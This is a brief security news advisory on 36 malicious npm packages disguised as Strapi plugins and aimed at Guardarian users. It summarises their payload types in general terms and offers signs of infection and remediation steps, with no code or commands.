Malicious Strapi NPM Packages Target Guardarian Users

What Happened

A recent supply chain attack has compromised the Strapi ecosystem, with hackers publishing 36 malicious NPM packages. These packages, disguised as Strapi plugins, were identified by the security firm SafeDep. They are capable of executing various malicious payloads that can lead to severe security breaches.

How It Works

The malicious packages deliver a range of harmful functionalities, including:

• Redis code execution
• Docker container escape
• Credential harvesting
• Reverse shell deployment
  One of the notable payloads exploits Redis instances, allowing attackers to inject crontab entries and deploy webshells. Another payload targets Docker containers, enabling unauthorized access to host directories and sensitive information.

Who's Being Targeted

This campaign specifically targets users of the cryptocurrency payment gateway Guardarian. The attackers demonstrated a clear understanding of the Guardarian ecosystem, probing its databases and utilizing a Guardarian API module in their attacks.

Signs of Infection

Users who have installed these malicious packages might notice unusual activity, such as:

• Unexpected reverse shell connections
• Unauthorized access attempts to databases
• Changes to configuration files

How to Protect Yourself

If you suspect you have installed any of these malicious NPM packages, take immediate action:

1. Rotate all credentials, including database passwords and API keys.
2. Monitor your systems for unusual activity or unauthorized access.
3. Remove any suspicious packages from your environment.
4. Stay updated on security advisories related to Strapi and NPM packages.

What You Should Do

SafeDep advises all users of Strapi to be vigilant. The targeted nature of this attack highlights the importance of using trusted packages and regularly auditing dependencies. By rotating credentials and monitoring for suspicious activity, users can mitigate the risks posed by these malicious packages.